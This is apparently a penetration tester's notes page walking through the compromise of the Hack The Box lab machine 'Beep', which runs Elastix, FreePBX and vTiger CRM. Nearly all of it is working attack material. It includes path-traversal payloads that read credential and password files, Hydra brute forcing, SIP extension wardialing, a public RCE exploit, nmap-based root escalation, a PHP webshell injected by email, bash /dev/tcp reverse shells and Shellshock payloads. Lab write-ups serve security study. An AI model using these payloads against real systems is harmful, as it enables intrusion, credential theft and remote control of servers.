Elastix FreePBX
Elastix LFI graph.php
Elastix version: FreePBX 2.8.14
google "elastix vulnerabilities"
Elastix 2.2.0 graph.php Local File Inclusion (LFI)
amportal.conf - Config file target will give up the Creds
If you find user/pw - fire up hydra and crack it
searchsploit elastix
searchsploit -m 37637 ..copy LFI
https://$IP/vtigercrm/graph.php?current_language
=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
=../../../../../../../..//etc/passwd%00&module=Accounts&action
Ignore users with nologin
vim > :g/nologin/d
Fix formatting:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt
hydra -L users.txt -P pass.txt ssh://$IP
Passwords found here.. could be used as 'root' :)
(beep htb)Elastix LFI vtigercrm
vTiger CRM 5.1.0
gobuster found 'vtigercrm' folder
searchsploit vtiger found: Local File Inclusion - 18770.txt
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=english.php HTTP/1.1
?module_name=../../../../../../../../etc/passwd%00
?module_name=../../../../../../../../proc/self/status%00
?module_name=../../../../../../../../var/mail/askerisk%00
View Page Source!
Found: uid:100:asterisk, passwd, mail-readPBX Extensions
https://$IP/panel ..Target will show extensions (if you can access)
SIPVicious: Find active 'extensions' by wardialing your PBX
sudo apt install sipvicious
> svmap 10.129.113.87 -vv
+--------------------+---------------------+-------------+
| SIP Device | User Agent | Fingerprint |
+====================+=====================+=============+
| 10.129.113.87:5060 | FPBX-2.8.1(1.8.7.0) | disabled |
+--------------------+---------------------+-------------+
> svwar -h
> svware $IP
> svwar -D -m INVITE $IP
> svwar -D -m INVITE $IP -e100-300 --force
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+Remote Code Execution
FreePBX 2.8.14
searchsploit freepbx 2.8.14
Found: 2.10.10 / Elastix 2.2.0 - Remote Code Execution: php/webapps: 18650.py
Did you read the notes?
Elastix often allows us to run nmap with interactive
searchsploit -m 18650
vim 18650
lhost = $MyIP
rhost = $IP
extension='1000' ..default extension
extension='238' ..found with svware
url = 'https://....'
urllib.urlopen(url) ..original
print(url) ..to troubleshoot
nc -nvlp 4444
whoami
asterisk
sudo nmap --interactive
nmap> !sh
id ..rootEmail php injection
Requires:
smtp:25 open
user/pass of email account
LFI that can open/execute under same account
-------------
smtp:25
telnet $IP
EHLO mutatedknutz.beep.localdomain ..extended hello
VRFY hacked@localhost ..rejected
VRFY asterisk@localhost ..connect!
mail from:hacked@hacked.com
rcpt to:askerisk@localhost
data
Subject:Testing!
Hello ..test #1
<?php echo "Php success"; ?> ..test #2
<?php echo system($_REQUEST['command']); ?> ..test #3
.
quit
-------------
Use LFI to pull mail/file:
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=../../../../../../../../var/mail/askerisk%00
&command=whoami HTTP/1.1
&command=hostname HTTP/1.1
&command=bash -i >& /dev/tcp/10.x.x.x/5151 0>&1 HTTP/1.1
Update as: URL Encoded (with burp)
nc -nvlp 5151
whoami
asterisk !!Metasploit
Optional method: "vtiger soap upload"
MSF SSL Issue/Fix: 6783
searchsploit vtigercrm
msf: vtiger_soap_uploadPBX Shellshock
() { :;}; echo; /usr/bin/wget https://$IP ..test
() { :;}; bash -i >& /dev/tcp/$IP/443 0>&1 ..reverseLast updated
Was this helpful?